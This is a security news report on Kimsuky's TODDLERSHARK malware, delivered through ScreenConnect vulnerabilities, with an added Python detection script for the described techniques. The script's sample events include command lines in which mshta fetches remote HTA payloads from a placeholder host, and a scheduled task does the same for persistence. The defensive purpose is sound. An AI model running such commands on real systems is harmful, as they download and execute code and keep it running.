2024-03-05

Some hackers from North Korea have exploited the recently disclosed security vulnerabilities in ConnectWise ScreenConnect to distribute a new malware called TODDLERSHARK.

According to a report shared by Kroll, TODDLERSHARK has overlaps with well-known Kimsuky malware such as BabyShark and ReconShark.

What is known about the malware named TODDLERSHARK

“The cybercriminal gained access to the victim's workstation by exploiting the exposed configuration of the ScreenConnect application,” said security researchers Keith Wojcieszek, George Glass and Dave Truman. “They then exploited their 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB)-based malware.”

The ConnectWise vulnerabilities in question are CVE-2024-1708 and CVE-2024-1709, which emerged last month and have been heavily exploited by various cyber criminals to deliver cryptocurrency miners, ransomware, remote access trojans and information-stealing malware.

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball and Velvet Chollima, has constantly expanded its malware arsenal to include new tools, the latest of which are GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file; once started, the malware, written in VB script, exfiltrates system information to a command and control (C2) server, maintains persistence on the system, and waits for further instructions from the operator.

Then, in May 2023, a variant of BabyShark called ReconShark was delivered to specifically targeted individuals through spear-phishing emails; TODDLERSHARK is assessed to be the latest evolution of the same malware due to similarities in code and behavior.

The malware, in addition to using a series of scheduled tasks for persistence, is also designed to capture and exfiltrate sensitive information from compromised systems, thus acting as a valuable reconnaissance tool.

TODDLERSHARK “shows elements of polymorphic behavior in the form of variable identity strings in the code, changing the position of the code via generated junk code and using uniquely generated C2 URLs, which may make this malware difficult to detect in some environments,” said the researchers.
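The behaviors the article attributes to this intrusion (a hands-on-keyboard cmd.exe session started from the ScreenConnect client, mshta.exe launched with a remote URL, and scheduled tasks used for persistence) are all visible in process-creation telemetry. The following is an added detection example written for this page; it is not Kroll's code, nor anything from the malware, and it assumes Sysmon-style fields (parent image, image, command line) and a ScreenConnect client process name, which are assumptions rather than facts taken from the report. The sample events are constructed.

```python
"""Flag process-creation events that match the TTPs described above.

Added example, not part of the original article. Field names follow a
Sysmon-like shape (ParentImage / Image / CommandLine); the ScreenConnect
parent process name and all sample data are constructed assumptions.
"""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Script hosts commonly used to run HTA/VBScript payloads from a task.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Return the lowercase file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def find_suspicious(events):
    """Return (rule_name, event) pairs for events matching any rule."""
    findings = []
    for ev in events:
        img = _basename(ev.image)
        parent = _basename(ev.parent_image)
        cmd = ev.command_line.lower()

        # Rule 1: mshta.exe fetching an HTA from a URL (remote VB payload).
        if img == "mshta.exe" and URL_RE.search(ev.command_line):
            findings.append(("mshta_remote_hta", ev))

        # Rule 2: scheduled task whose action is a script host or a URL
        # (persistence via tasks, as described for TODDLERSHARK).
        if img == "schtasks.exe" and "/create" in cmd and (
            any(host in cmd for host in SCRIPT_HOSTS) or URL_RE.search(ev.command_line)
        ):
            findings.append(("schtasks_script_persistence", ev))

        # Rule 3: a shell spawned by the remote-support client. Technicians
        # do this legitimately, so treat it as a lower-severity correlation
        # signal rather than a stand-alone alert.
        if parent.startswith("screenconnect") and img in ("cmd.exe", "powershell.exe"):
            findings.append(("remote_support_shell", ev))
    return findings


# Constructed sample telemetry; the .invalid domain is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(
        r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
        r"C:\Windows\System32\cmd.exe",
        r'cmd.exe /c "mshta.exe http://payload.invalid/a.hta"',
    ),
    ProcEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\mshta.exe",
        "mshta.exe http://payload.invalid/a.hta",
    ),
    ProcEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\schtasks.exe",
        'schtasks /create /sc minute /mo 30 /tn "Update" /tr "mshta http://payload.invalid/b.hta"',
    ),
    # Benign: local HTA opened from Explorer, no URL.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\u\help.hta"),
    # Benign: ordinary service start.
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
]


def detect_sample():
    """Rule names fired by the constructed sample, in event order."""
    return [name for name, _ in find_suspicious(SAMPLE_EVENTS)]


if __name__ == "__main__":
    for name, ev in find_suspicious(SAMPLE_EVENTS):
        print(f"{name}: {ev.command_line}")
```

Rule 3 on its own will fire on every legitimate support session, so in practice it is best used to raise the severity of rules 1 and 2 when they occur shortly after it on the same host rather than as an alert by itself.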

The development comes as South Korea's National Intelligence Service (NIS) accuses its northern counterpart of compromising the servers of two national semiconductor manufacturers (not named) and stealing valuable data.

The digital intrusions occurred in December 2023 and February 2024; it would appear that the attackers targeted vulnerable Internet-exposed servers to gain initial access, subsequently relying on “living-off-the-land” (LotL) techniques rather than dropping malware, in order to better evade detection.

“North Korea may have begun preparations for its own semiconductor production due to difficulties in acquiring semiconductors due to sanctions against North Korea and increased demand linked to the development of weapons such as satellite missiles,” the NIS declared.

Cases similar to TODDLERSHARK and some considerations

Similar cases of cyber threats exploiting vulnerabilities in remote connection software have emerged in different global contexts; these incidents highlight the importance of cybersecurity and the need for continued vigilance in digital infrastructures. Note that one of these similar cases also concerns cyber criminals from North Korea, who exploited Log4j.

The international community, together with companies and government bodies, is called upon to collaborate to develop and implement robust cyber defense measures in order to mitigate the risk of advanced cyber attacks; the sharing of information and the adoption of best practices are therefore essential (to protect against “attacks” which, like TODDLERSHARK itself, often begin as bait) to address growing threats in the increasingly complex and interconnected digital landscape.